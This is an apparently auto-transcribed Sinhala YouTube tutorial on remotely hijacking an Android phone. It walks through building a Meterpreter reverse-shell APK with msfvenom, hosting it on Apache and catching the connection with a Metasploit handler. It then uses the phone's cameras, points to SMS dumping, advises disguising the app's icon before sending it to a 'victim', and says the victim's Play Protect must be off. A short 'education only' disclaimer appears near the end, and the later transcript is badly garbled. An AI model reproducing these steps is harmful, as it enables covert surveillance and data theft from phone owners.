welcome back. so මම ඊපෙරේදත් වීඩියෝ එකක් දැම්මා YouTube එකට. මම හිතනවා ඔයාලා එකක් බලන්න නැති කියලා. so අපේ කලින් වීඩියෝ එකේ කෙනෙක් කමෙන්ට් එකක් දාලා තිබ්බා මොබයිල් එකක් කොහොමද හැක් කරන්න කියලා. අද අපි ඒක ගැන පොඩ්ඩක් එක්ස්ප්ලෝර් කරලා බලමු. එහෙනම් අපි යමු වීඩියෝ එකට. ඕකේ, ඉතින් කලින් වීඩියෝ එකේ අපි කරේ Metasploit කියන OS එක, VirtualBox එකේ රන් වෙන OS එක අපි අපේ Kali Linux වලින් IP address එක කරා පොඩ්ඩක් exploit කරලා hack කරලා බලුවා. අද අපි බලමු කොහොමද අපේ මොබයිල් ෆෝන් එක access කරන්න කියලා, remotely access කරන්න කියලා use කරන tool එක තමයි MSF Venom. ඒ කියන්නේ MSF Venom කියන tool එක හරහා අපි APK එක හදලා ඒ APK එක තමයි අපි victim ගේ phone එකට යවනවා. හරි. sending APK එක හරහා අපි කොහොමද phone එකේ access ගන්න කියලා අපි බලමු. අපි මුලින්ම බලමු හරි. අපි මුලින්ම ටර්මිනල් එක ඕපන් කරලා අපේ APK එක හදන වැඩේ පටන් ගමු. APK එක හදන්න පොඩි කමාන්ඩ්ස් වගේක් දෙන්න තියෙනවා. ඒක ගැන මම දැන් විස්තර කරන්නම්. හරි. sudo කියලා ගහලා අපි මුලින්ම යන්න ඕනේ sudo -s ගහලා අපි යන්න ඕනේ අපේ root terminal එකට. හරි, root access ගත්තා. අපි දැන් root එක ඇතුළේ තමයි ඉන්නේ. හරි, මම දැන් මෙතන ගහනවා msf venom -p plug එකක් දුන්නා. android හරි, android/metapredator කියලා ගහලා ස්පෙනිෂ් වර්ධින් නැති වෙන ගහන්න. මොකද ස්පෙනිෂ් වර්ධුනොත් ආයෙ උගලන්ට මුලින් ඉඳන් ගහන්න වෙනවා. මාත් මේක ප්‍රැක්ටිස් කරද්දී ගොඩක් ටයිප් කරන්න උනා. ඒක නිසා හරියට ස්පෙනිෂ් බලලා ගහන්න. metapredator/reverse_tcp tcp ඊට පස්සේ p ටයිප් කරගන්න ඕනේ lhost කියලා equal එන් සමාන ලකුණ ගහලා අපි new window එකක් කරගෙන අපේ IP එක බලාගමු. අපි මං ගිය වීඩියෝ එකේ කියලා දුන්නා අපේ IP එක හොයාගන්න කොහොමද කියලා. ifconfig කියලා ගහලා enter දුන්නාම ඔන්න දැන් එනවා අපේ local IP එක. මේක මම copy කරගෙන මෙතනට paste කරනවා. හරි. space එකක් තියලා lport කියලා දෙන්න ඕනේ. ඔක්කොම capital අකුරු වලින් තමයි දෙන්න ඕනේ. lport equal 4444 444 කියලා ගහුවා. r greater than අපි මෙතනට දෙන්න ඕනේ පොඩි path එකක්. අපි Apache 2 හරහා මේක host කරගන්න ඕනේ හින්දා අපි මෙතනට පොඩි path එකක් දෙන්න ඕනේ. ඒ path එක මම මෙතන හරි type කරනවා /var/www/html/ අපේ APK එකේ නම ගහන්න ඕනේ. මම මෙතන දෙන්නම් cute කියලා cute.apk ගහලා enter කරන්න ඕනේ. මේක enter කරාට පස්සේ APK එක හැදෙනවා. කොහරි error එකක් තිබ්බොත් හැදෙන්නේ නැහැ. බලමු. හරි, ඕකේ. APK එක හැදුනා. කිසිම error එකක් නැතුව 1223 byte තියෙන APK එකක් හැදුනා. පොඩි ගාණක් APK එක. හරි. මෙන්න මේ path එකට අපි යන්න ඕනේ. මේ path එක අපි cd කරලා අර copy කරගත්ත path එක මෙතනට paste කරමු. අපි enter දීලා ls ගහුවාම ඔන්න දැන් පේනවාට cute apk කියන අපි හදාගත්ත app එක තියෙනවා. ඕකේ. අපි මෙතනින් හරි, දැන් අපි මෙතන Apache 2 හරහා මේක host කරගන්න ඕනේ. Apache 2 service එක අපි start කරගමු. ඒකට අපි ගහන්න ඕනේ service
Apache 2 ස්ටාර්ට් කියලා ගහලා එන්ටර් කරන්න ඕනේ. එන්ටර් කරාම කිසිම එන්නේ නැහැ ඔයගොල්ලන්ට කිසිම මේ පෙන්වන්නේ නැහැ ඔයගොල්ලෝ ස්ටාර්ට් වුණාද නැද්ද කියලා පෙන්වන්නේ නැහැ. ඉතින් අපි ඒක බලා ගන්න ආයෙ ටයිප් කරනවා service Apache 2 status service Apache 2 status කියලා ටයිප් කරාම sorry status හරි අන්න දිරවල වෙනන active running වෙලා තියෙනවා Apache 2 active වෙලා running අවස්ථාවේ තමයි දැන් තියෙන්නේ. ඒක නිසා මම මේ ටර්මිනල් එක මිනිමයිස් කරලා new ටර්මිනල් එකක් ගන්නවා. මොකද අපි දැන් run කරගන්න ඕනේ MSF console එක. අපි ගිය වීඩියෝ එකෙත් වැඩ කරේ ඒක හරහා තමයි. කලින් වීඩියෝ බලපුවා දන්නේ නැති ඒක කොහොමද run කරගන්නේ කියලා. ඉතින් බලපු නැති කට්ටිය එකත් බලලා මේකත් බලන්න. ඊට පස්සේ බලමු මේකේ කියන දේ තියෙනවා ඩිවයිස් දෙකම එකම කනෙක්ෂන් එක තියෙන්න ඕනි. අන්න ඒක වැදගත්. එකම කනෙක්ෂන් එකකට කනෙක්ට් වෙලා තියෙන්න ඕනි ඩිවයිස් දෙකම රිමෝට්ලි ඇක්සස් කරත් කොහොම ඇක්සස් කරත් ඩිවයිස් දෙකම එකම නෙට්වර්ක් එකක් ඇතුලේ තියෙන්න ඕනි. ඔයාලට වෙන කෙනෙක්ගේ නෙට්වර්ක් එකකට ඇතුල් වෙන්න ඕන නම් Wi-Fi Pineapple වගේ එකක් පාවිච්චි කරන්න පුළුවන්. එතකොට අපිට කිසිම එරරකින් තොරව ඇක්සස් ගන්න පුළුවන් ඕනම නෙට්වර්ක් එකකට. හරි. දැන් අර අපි හදාගත්ත ඇප් එක වික්ටිම්ට යවන්න ඕනේ. වික්ටිම්ට යවන්න නම් අපිට පුළුවන් using WhatsApp කියන්නේ WhatsApp එක පාවිච්චි කරලා යවන්න පුළුවන්. using data cable. ඉතින් data cable එක කරා ෆෝන් එකට දාලා ෆෝන් එකේ ඉන්ස්ටෝල් කරලා වික්ටිම්ගේ ෆෝන් එකේ තියන්න පුළුවන් අපිට. ඊමේල් එක කරා වුණා ඇප් එක යවන්න පුළුවන්. ඇප් එක ඉතින් ඕගොල්ලෝ අයිකන් එහෙම වෙනස් කරලා ඒක හදා ගන්නවා. මම කියලා දෙන්නේ නැහැ. Android icon එකමයි මම හදපු ඇප් එක තියෙන්නේ. ඒකට icon එක එහෙම දාලා ලස්සනට victim-ට සැකරන හිතන විදිහට යවන්න පුළුවන්. ඕකේ. ඉතින් මෙතන අපි ටයිප් කරගන්න ඕනි හරි. ඔයාලට මතකද මේ මම අර පාත් එකක් දුන්නේ www html එක ඇතුලේ ඔන්න තියෙනවා PPK එක. මම ඒක කොපියක් දාගෙන data cable එකෙන් සම්බන්ධ කරලා තියෙනවා මගේ ෆෝන් එක. PPK එක ඇතුලේ paste කරගන්නවා. මගේ ෆෝන් එක Samsung A02 Core එකක්. ඉතින් අන්නේ ෆෝන් එක තමයි මම access කරන්න යන්නේ. හරි. අපි දැන් යම් console එකට console එකේ type කරගන්න ඕනි app එක run කරන්න කලින් console එකේ type කරගන්න දේවල් ටිකක් තියෙනවා. start කියන මගේ step ටික follow කරන්න වරදින්නේ නැහැ. ඕකේ. හරි. මම දැනට ටර්මිනල් එක පොඩ්ඩකට ඔෆ් කරලා බලනවා Apache 2 run වෙන ගමන් තමයි තියෙන්නේ. හරි. මම දැන් window එක කරගෙන ටක් ගාලා හරි. new window එක ටක් ගාලා MSF console කියලා console එක run කරගන්න. කලින් window එක close වුණා. හරි. වීඩියෝ එක ටිකක් දිග තී කරන්න දෙයක් නැහැ. ටිකක් ලොකු මිෂන් එකක් මේක. ටිකක් ලොකු මිෂන් එකක් කරන්නත් බෑ. හරි. හරි ස්ටාර්ට් වුණා. දැන් මෙතන ටයිප් කරගන්න ඕනේ use exploit
multi/handle ඊට පස්සේ එන්ටර් කරාම ඔන්න ඔය විදිහට අපි multi handle එක තුලට යනවා tool එක තුලට. ඊට පස්සේ අපි set payload මම මේ ටයිප් කරන විදිහටම ටයිප් කරන්න. set payload කියලා ටයිප් කරලා අපි කලින් ටර්මිනල් එකට ගිහිල්ලා මෙන්න මෙතන Android කියන දන Metapreter reverse TCP කියන තැනට යනවා කොපියක් දාගන්න ඕනේ. කොපියක් දාගෙන දැන් paste කරන්න. ටයිප් කර කර ඉන්න ඕනේ නැහැ. copy paste කරන්න. හරි. ඔන්න ඒ විදිහට copy paste කරාම show option දුන්නොත් වර්ධුණා අයියකට දෙයක් වදුණා. show options හරි. ඔන්න ඔය විදිහට show option දුන්නා. ඔයගලන්ට පේනවා L port එක අපි set කරගත්ත port එකම තියෙනවා. but L host එක නෑ මෙතන. අපි set කරගමු L host එක. L host අපේ IP එක දෙන්න ඕනේ. අපේ IP එක මතක නැත්තම් බලන්න විදිය මම ඔයගොල්ලෝ දන්නවා. ifconfig කියලා ගාලා බලන්න පුළුවන්. අපි ඒක බලමුකෝ. හරි. show option දීලා ආයි බලමු. මොකද L host එක හරියටම set වෙලා කියලා බලා ගන්න ඕනේ. හරි. ඔන්න විදිහට L host එක set වෙලා තියෙනවා. අපි ඉතින් දැන් මෙතන වෙන කරන්න දෙයක් නැහැ. exploit කරන්න තමයි තියෙන්නේ. මෙතන exploit කියලා type කරගන්න කලින් කරන්න දෙයක් තියෙනවා. ඒ තමයි අපේ app එක install කරගන්න එක. මම මගේ phone එකේ screen එක PC එකට connect කරගන්නකම් පොඩ්ඩක් ඉන්න. හරි. ඔන්න ඔය විදිහට තමයි phone එක දෙන්නේ. ඉතින් මම phone වල files වලට ගිහිල්ලා පොඩි lag එකක් යනවා. signal loss එකක් වෙන්න ඕනි. නැතුව lag වෙන්න විදිහක් නැහැ. ඔන්න ඔය විදිහට APK වල cute APK එක තියෙනවා. අපි හදාගත්ත කේවි කිලෝබයිට් 10.23ක. හරි. මම දැන් මේක install කරගන්නවා. next දීලා install දෙනවා. install කරනකොට ඔන්න විදිහට install වෙලා තියෙනවා කියලා open කියලා වටනවා. මම මෙතනින් close කරනවා මේක. මෙතනින් close වෙලා app එකට යනවා. හරි. මම දැන් යනවා මගේ terminal එකට ආයි. terminal එකට ගිහිල්ලා exploit කියලා ගහලා මේක enter කරගන්න ඕනි. exploit කියලා ගහලා මේක enter කරගන්න ඕනි. එන්ටර් කරගත්ත පස්සේ ඔන්න විදිහට ස්ටාර්ට් වෙනවා. ඉතින් මම දැන් මෙතන app එක ඕපන් කරනවා phone එකේ. phone එකේ app එක ඕපන් කරපුව ගමන් මෙන්න මෙතනින් sending වෙලා stage එක sending වෙලා ඔන්න විදිහට Metapreter එක ඕපන් වෙනවා. ඕකේ. ඔන්න විදිහට Metapreter එක ඕපන් වුණා කියන්නේ දැන් අපි phone එකත් එක්ක communicate වෙනවා. ඒ කියන්නේ phone එකට connect වෙලා ඉවරයි. හරි. but app එකෙන් කිසිම දෙයක් උනේ නැහැ. ඔයාලට පේනවාද? ඔන්න ඉතින් මම phone එකේ screen එකත් off කරා. දැන් ඔයාලට පේනවාද? සාමාන්‍ය screen එක ওই විදිහට wallpaper විතරක් පේන්නේ. screen එක off වෙලා තියෙනවා. මෙතන sys info info ගහුවම ඔයාලට පේනවා Android localhost Android 8.1 version එකේ තමයි තියෙන්නේ. 8.1 version එකේ. ඔන්න ඉතින් තමයි අපි phone එකට connect වෙන්නේ. හරි. අපි බලමු මේකේ කොහොමද camera access එක ගන්න කියලා. මේකේ විශේෂ tool එකක් තමයි camera access ගන්න එක. webcam _ flag එකක් දෙන්න ඕන -i කියලා. ඊට පස්සේ backcam එකේ number එක තමයි 1. front cam එකේ number එක තමයි 2. 1 2 කියලා තමයි cam දෙක මෙතනින් flag කරන්න තියෙන්නේ. පොඩ්ඩක් ඉන්න මෙතන error එකක් ආවා. Metapreter system close it. මොකක් හරි error එකක් තියෙනවා. පොඩ්ඩක් ඉන්න එක වෙයි. විසඳගමු. ආයි බලමු exploit කියලා ගහලා
හරි ආයෙත් මෙටා ප්‍රීටයකට අපි යම්බල හරි ඕකේ මෙටා ප්‍රීටකට ආවායි අපි ආය අපි ගහල බලමු කැම් එකේ ඇක්සස් ගන්න වෙබ්කෑම් අන්ඩස්කෝ ස්නප් හයිපන්නයි එක එතන්ට හයිපන්න ගන එක විතරයි අන්න ඉදිර ස්ටෝ අන්න වැදුන ෆොටෝ එක හරි බැක්කෑම් එක තම ෆොටෝ එක වැදුනේ ඔන්න ඉදිට ෆොටෝ එක වැදිලා පේ පිසි එක පෙන්න්නනවා ෆෝන් එක බැක්කම එක ඕලට පෙනති ෆෝන් එක ස්ක්‍රීන් එක ඔන්නලා නෑ ස්ක්‍රීන ගෝෆ්ලා තියන්නේ අප අයි ෆොටෝ ගල්වලු පාට පෙනති මගේ ලැප් එක ෆෝන් එකම අල්ලං ඉන්නේ ඔන්න ඉදිට අපිට එක්සස් ගන්න පුළුවන් ෆෝන් එක බල ඕකේ තව ෆොටෝ එකත් අන්න දෙද කැම එක්සස් ගන්න පුළුවන් බලමු ෆ්‍රොන්් කැම් එක සෙල්ෆයක් ගහලා ඕකේ මගේ අතට හිටල එක පේනෑ බලමු තව ෆොටෝ එකක් ගහලා හරි ඔන්න ඉදිට ෆෝටෝ එක වැදුන මොන්න දිරන අපි වැැක්කම් ගන්නේ බැක්කම් ෆොන්් කෑම් ඇක්සස් ගන්න පුළුවන් තව තියෙනවා ඔකුලන්ට ගොඩත් දේවල් වෙන්නන්න මෙතන ටූල්ලගේ ගොඩක් තියෙනවා ඩූල්ස් වර්ග ගොලෝ කමන්ස් ගහල බලන්න මං එකක් විතර ඔතන පෙන්වේ දැම් වෙබ්කෑම් ස්නප් කියන එක ඔතන අපිට ඇපින්ස්ටෝ කරන්න ඕන දෙ ඇපින්ස්ටෝ කරන්න අන්නස්ටෝ කරන්න ඇප කරන්න කරන්න පුළුවන් ෆෝන් එක තියෙන ඒවගේ ගොඩක් කමන්ස් තියෙනවා ඉති මොගොල්ල එක පොඩ්ඩක් කරලා බලන්න ටූල් එක මං පෙන්න්නනම් කොහොමද ටික් ගන්න කියලා ආයරන්න නකමන්්ඩ හරි ගාන මේ ෆොටෝටික සේව්වෙන්නේ එන්න දෙනින් ගිහිල්ල ෆොටෝටික සේව්වෙන්න තැන්න ලිනක්සල පේන ඇති එක ලයිව් තම ෆෝන් එක කනෙට්ලා තියන්නේ කලවලට පේනවා ටයිම් ඇත්තනවා ලයිව් තම ෆෝන් එක කනෙට්ටලා තියන්නේ ෆෝනය කරනට සේරම අරගේ පේනවා ස්ක්‍රීන් එක හරි මඳ මේ කලෝස් කරගන්නකෝ හරි මම මෙතන පොඩි කමණ්ඩක් ගහල පෙන්න්න ඔගොලොන්ට හෙල්ප් කියල ගැහුව ගොලට පේන වෙන්න එතන සේරම ටූල්ස් තියෙනවා මැසේජ් ඕගොලන්ට ෆෝන් එක තින මැසේටි ඔක්කෝ බලන්න ඔන්න ඩම් SMS තියෙනවා ඒ වගේ සෙන්සම තියෙනවා සෙන්් කරන් ප්ලයි SMS ඇපරන් තියනවා පන්ස්ටල් මංකිවන දකුලට ඉස්ට්‍රෝ ගන්න පුලන් කියලා ඒටික තමයි එතන තිබට ටික වැඩි පොඩ්ඩක් ස්ටඩි කල්ලා ඔගොලන්ට කරන්න පුළුවන් ආයම මතක් කරන්නා මේක එඩිකේෂන් ප්‍රපෝස් ඔන්ලි වැඩවලට තර පාච්චි කරන්න මිහිං අමාරු වැටලා හිං මරුවටන අපි වගේ කියන්න ඔන්න අතන තම ෆොටෝටික සෙව්වෙන් යොකලන් ෆයිල්ස් වල හරි මන්දම් මෙතනින් ගිහිල්ලා මගේ අපාච්චේට රන් වෙන ගමන් තමා තාම තියන්නේ කියන්න මගේ ස්ටොප් කරගන්නවා සර්විස් අපාචිට මෙතන ස්ටේටස් වෙනුවට ස්ටොප් කියලා ටයිප් කරලා එන්ටර් කරාම මේක ස්ටොප් වෙලා යනවා ඕකේ ඉතින් ආයි කියනවා විහින් අමාරු වැටෙන්න්න බා මේ දේවල් කරලා මේ දින පහදාගත් ඇප් එක හරි ඇප් එක කොහෙද ඉච්චායි කියන්න තියෙන එකම දේ විහින් අමාරු වැටෙන්න්න පා ඔගොල්ල මේක ඩිවේශන දෙවල්ල ඩිතර පාවිච්චි කරන්න මොකද ඇතික හැක කෙනෙකුුණ හම වගේ දෙවල් කරලා බලන්න ඕනේ තමන්ගේම ඩිවසයක් හැක්කරට කිසිම ප්‍රශ්නයන්න බට් වෙන කෙනෙක්ගේ
ෆෝන් එකක් ගැන OS එකක් ඩිවයිස් එක හැක් කරන්න යන්න එපා. හරි මෙතන තියෙන තව දෙයක් තමයි ඔයගොල්ලෝ ටර්න් ඔෆ් කරලා තියන්න ඕනේ victim ගේ mobile play protect එක. play protect කියන එක ඔෆ් කරලා තමයි කරන්න ඕනේ. මම ඉස්සරහ වීඩියෝ එකකින් ගේන්නම් play protect bypass කරන විදිය. මොකද එතකොට play protect on off කරන්න ඕනේ නැහැ. bypass කරාම හරි. යන්න තින්ටින් subscribe කරලා like කරන්න, comment කරන්න, share කරන්න. යාළුවන්ට දැනගන්නත් හැමෝටම link එක share කරලා අපිට support එකක් දෙන්න. කියන්න වැඩි දෙයක් නැහැ තව. ඉස්සරහ වීඩියෝ ටිකක් ගේන්න. පිහින් අමාරු වැටෙන්න එපා. අපි වගේ කියන්නේ නැහැ. එහෙනම් goodbye හැමෝටම.